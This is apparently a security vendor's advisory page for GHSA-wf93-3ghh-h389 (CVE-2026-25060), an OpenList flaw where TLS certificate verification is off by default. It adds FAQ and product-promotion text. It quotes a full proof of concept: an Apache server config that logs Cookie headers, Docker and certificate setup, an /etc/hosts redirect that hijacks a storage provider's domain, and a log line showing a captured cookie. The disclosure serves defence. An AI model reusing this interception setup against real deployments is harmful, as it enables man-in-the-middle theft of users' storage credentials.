How severe is GHSA-wf93-3ghh-h389?

GHSA-wf93-3ghh-h389 has a CVSS score of 8.1/10, rated HIGH. Immediate patching is strongly recommended.

Which packages are affected by GHSA-wf93-3ghh-h389?

GHSA-wf93-3ghh-h389 affects the following packages: github.com/OpenListTeam/OpenList/v4 (Go). Ecosystems affected: Go.

How do I fix GHSA-wf93-3ghh-h389?

Update github.com/OpenListTeam/OpenList/v4 to 4.1.10 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-wf93-3ghh-h389 is resolved across your whole dependency graph.

How do I detect GHSA-wf93-3ghh-h389 in my Go dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/OpenListTeam/OpenList/v4. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-wf93-3ghh-h389 if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-wf93-3ghh-h389?

O3 pinpoints whether GHSA-wf93-3ghh-h389 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-wf93-3ghh-h389 actively exploited in the wild?

No public exploit code has been indexed for GHSA-wf93-3ghh-h389 yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

What is the EPSS score for GHSA-wf93-3ghh-h389?

GHSA-wf93-3ghh-h389 has an EPSS (Exploit Prediction Scoring System) score of 0.2%, placing it in the 15th percentile of all CVEs. EPSS is maintained by FIRST.org and estimates the probability that a vulnerability will be exploited in the wild within the next 30 days. This score indicates relatively lower exploitation probability, though the CVSS severity should still guide your patching priority.

What type of vulnerability is GHSA-wf93-3ghh-h389?

GHSA-wf93-3ghh-h389 is classified as CWE-599 (CWE-599). This weakness type describe the underlying flaw category, which helps determine the potential impact and the right class of mitigation.

When was GHSA-wf93-3ghh-h389 published, and has it been updated?

GHSA-wf93-3ghh-h389 was published on February 2, 2026 and was last updated on February 5, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

🐹 Go

GHSA-wf93-3ghh-h389

HIGH

OpenList has Insecure TLS Default Configuration

Also known asCVE-2026-25060GO-2026-4397

Published

Feb 2, 2026

Updated

Feb 5, 2026

Affected

1 pkg

Patched

1 / 1

Exploits

None indexed

EPSS Exploitation Probability

via FIRST.org ↗

0.2%probability of exploitation in next 30 days

Lower Risk15th percentile+0.23%

EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.

Blast Radius

1 pkg affected

🐹github.com/OpenListTeam/OpenList/v4

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Go packages — download data is not available via public APIs for these ecosystems.

Description

Summary

The application disables TLS certificate verification by default for all outgoing storage driver communications, making the system vulnerable to Man-in-the-Middle (MitM) attacks. This enables the complete decryption, theft, and manipulation of all data transmitted during storage operations, severely compromising the confidentiality and integrity of user data.

Details

Certificate verification is disabled by default for all storage driver communications.

The TlsInsecureSkipVerify setting is default to true in the DefaultConfig() function in internal/conf/config.go.

func DefaultConfig() *Config {
    // ...
    TlsInsecureSkipVerify: true,
    // ...
}

This vulnerability enables Man-in-the-Middle (MitM) attacks by disabling TLS certificate verification, allowing attackers to intercept and manipulate all storage communications. Attackers can exploit this through network-level attacks like ARP spoofing, rogue Wi-Fi access points, or compromised internal network equipment to redirect traffic to malicious endpoints. Since certificate validation is skipped, the system will unknowingly establish encrypted connections with attacker-controlled servers, enabling full decryption, data theft, and manipulation of all storage operations without triggering any security warnings.

PoC

We modified the /etc/hostsfile to simulate DNS hijacking and redirect www.weiyun.com to a malicious TLS-enabled HTTP server.

The purpose of this PoC is to demonstrate that the Openlist server will indeed establish communication with a malicious server due to disabled certificate verification. This allows us to intercept and steal authentication cookies used for communicating with other storage providers.

Setup a malicious https server:

ssl.conf:

LoadModule ssl_module modules/mod_ssl.so
LoadModule log_config_module modules/mod_log_config.so

Listen 443

LogFormat "%h %l %u %t \"%r\" %>s %b Host:%{Host}i User-Agent:%{User-Agent}i Referer:%{Referer}i Accept:%{Accept}i Cookie:%{Cookie}i" headers
CustomLog "/usr/local/apache2/logs/headers.log" headers

<VirtualHost _default_:443>
    DocumentRoot "/usr/local/apache2/htdocs"
    ServerName localhost

    SSLEngine on
    SSLCertificateFile "/usr/local/apache2/conf/server.crt"
    SSLCertificateKeyFile "/usr/local/apache2/conf/server.key"

    ErrorLog "/usr/local/apache2/logs/ssl_error.log"

    <Directory "/usr/local/apache2/htdocs">
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>
</VirtualHost>

Dockerfile:

FROM httpd:2.4

# Copy SSL config
COPY ssl.conf /usr/local/apache2/conf/extra/ssl.conf

# Include SSL config in main httpd.conf
RUN echo "Include conf/extra/ssl.conf" >> /usr/local/apache2/conf/httpd.conf

# Copy certs
COPY certs/server.crt /usr/local/apache2/conf/server.crt
COPY certs/server.key /usr/local/apache2/conf/server.key

build-ssh-httpd.sh

mkdir certs
openssl req -x509 -nodes -days 365 \
  -newkey rsa:2048 \
  -keyout certs/server.key \
  -out certs/server.crt
docker build -t httpd-test-ssl .

docker-compose.yaml:

services:
  openlist:
    restart: always
    volumes:
      - '/etc/openlist:/opt/openlist/data'
    ports:
      - '5244:5244'
      - '5245:5245'
    user: '0:0'
    environment:
      - UMASK=022
      - TZ=Asia/Shanghai
    container_name: openlist
    image: 'openlistteam/openlist:latest'

  evilhttpd:
    image: 'httpd-test-ssl:latest'

Simulate DNS hijacking

Modify openlist container's /etc/hosts to redirect www.weiyun.com to malicious server:

<IP of HTTPS Server>      www.weiyun.com

You can ping evilhttpd to obtain its IP.

Trigger

In the front end, add a weiyun storage and inspect log on tls server:

root@3c5bbda440c9:/usr/local/apache2# tail -n 1  /usr/local/apache2/logs/headers.log
172.18.0.2 - - [18/Dec/2025:06:29:48 +0000] "POST /webapp/json/weiyunQdiskClient/DiskUserInfoGet?cmd=2201&g_tk= HTTP/1.1" 404 236 Host:www.weiyun.com User-Agent:Mozilla/5.0 (Macintosh; Apple macOS 15_5) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 Chrome/138.0.0.0 Referer:- Accept:- Cookie:test-secret-cookie=

Note that the cookie in the log.

Impact

This misconfiguration allows attackers to perform man in the middle attack, which potentially leads to the complete decryption, theft, and manipulation of all data transmitted during storage operations, severely compromising the confidentiality and integrity of user data.

This vulnerability affects all openlist deployment with default TLS configuration.

Note

Credit This vulnerability was discovered by:

XlabAI Team of Tencent Xuanwu Lab
Atuin Automated Vulnerability Discovery Engine

CVE and credit are preferred.

If you have any questions regarding the vulnerability details, please feel free to reach out to us for further discussion. Our email address is [email protected].

We follow the security industry standard 90+30 disclosure policy. If the aforementioned vulnerabilities cannot be fixed within 90 days of submission, we reserve the right to publicly disclose all information about the issues after this timeframe.

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
🐹Go	`github.com/OpenListTeam/OpenList/v4`	all versions	4.1.10

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for github.com/OpenListTeam/OpenList/v4. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update github.com/OpenListTeam/OpenList/v4 to 4.1.10 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-wf93-3ghh-h389 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-wf93-3ghh-h389 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-wf93-3ghh-h389. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary The application disables TLS certificate verification by default for all outgoing storage driver communications, making the system vulnerable to Man-in-the-Middle (MitM) attacks. This enables the complete decryption, theft, and manipulation of all data transmitted during storage operations, severely compromising the confidentiality and integrity of user data. ### Details Certificate verification is disabled by default for all storage driver communications. The `TlsInsecureSkipVerify` setting is default to true in the `DefaultConfig()` function in [internal/conf/config.go](https:/

O3 Security · Impact-Aware SCA

Is GHSA-wf93-3ghh-h389 in your dependencies?

O3 detects GHSA-wf93-3ghh-h389 across Go dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works